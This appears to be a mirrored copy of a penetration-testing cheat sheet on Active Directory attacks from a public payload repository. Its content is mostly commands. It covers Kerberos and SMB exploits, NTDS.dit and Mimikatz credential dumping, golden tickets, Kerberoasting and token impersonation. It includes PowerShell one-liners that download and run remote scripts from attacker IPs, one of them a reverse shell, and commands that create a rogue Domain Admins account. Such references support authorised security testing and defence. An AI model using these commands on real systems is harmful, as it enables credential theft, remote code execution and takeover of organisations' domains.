mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
3.8 KiB
3.8 KiB
Active Directory Attacks
Most common paths to AD compromise
- MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)
Exploit Python: https://www.exploit-db.com/exploits/35474/ Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068 Metasploit: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
- MS17-010 (Eternal Blue - Local Admin)
nmap -Pn -p445 — open — max-hostgroup 3 — script smb-vuln-ms17–010 <ip_netblock>
- Unconstrained Delegation (incl. pass-the-ticket)
- OverPass-the-Hash (Making the most of NTLM password hashes)
- Pivoting with Local Admin & Passwords in SYSVOL
findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml or Metasploit: scanner/smb/smb_enumshares Metasploit: windows/gather/enumshares Metasploit: windows/gather/credentials/gpp
- Dangerous Built-in Groups Usage
- Dumping AD Domain Credentials
C:\>ntdsutil
ntdsutil: activate instance ntds
ntdsutil: ifm
ifm: create full c:\pentest
ifm: quit
ntdsutil: quit
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
or
Metasploit : windows/gather/credentials/domain_hashdump
- Golden Tickets
mimikatz
kerberos::ptc tgt.bin
- Kerberoast
https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/ https://room362.com/post/2016/kerberoast-pt1/
- Silver Tickets
- Trust Tickets
Tools
- Impacket
- Responder
- Mimikatz
- Ranger
- BloodHound
- RottenPotato
- AdExplorer
Mimikatz
load mimikatz
mimikatz_command -f sekurlsa::logonPasswords full
PowerSploit
https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon
powershell.exe -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks”
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');"
PrivEsc - Token Impersonation (RottenPotato)
Binary available at : https://github.com/foxglovesec/RottenPotato
Binary available at : https://github.com/breenmachine/RottenPotatoNG
getuid
getprivs
use incognito
list\_tokens -u
cd c:\temp\
execute -Hc -f ./rot.exe
impersonate\_token "NT AUTHORITY\SYSTEM"
Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"
Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"
Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};"
PrivEsc - MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
Powershell:
https://www.exploit-db.com/exploits/39719/
https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1
Binary exe : https://github.com/Meatballs1/ms16-032
Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc
Local Admin to Domain Admin
net user hacker2 hacker123 /add /Domain
net group "Domain Admins" hacker2 /add /domain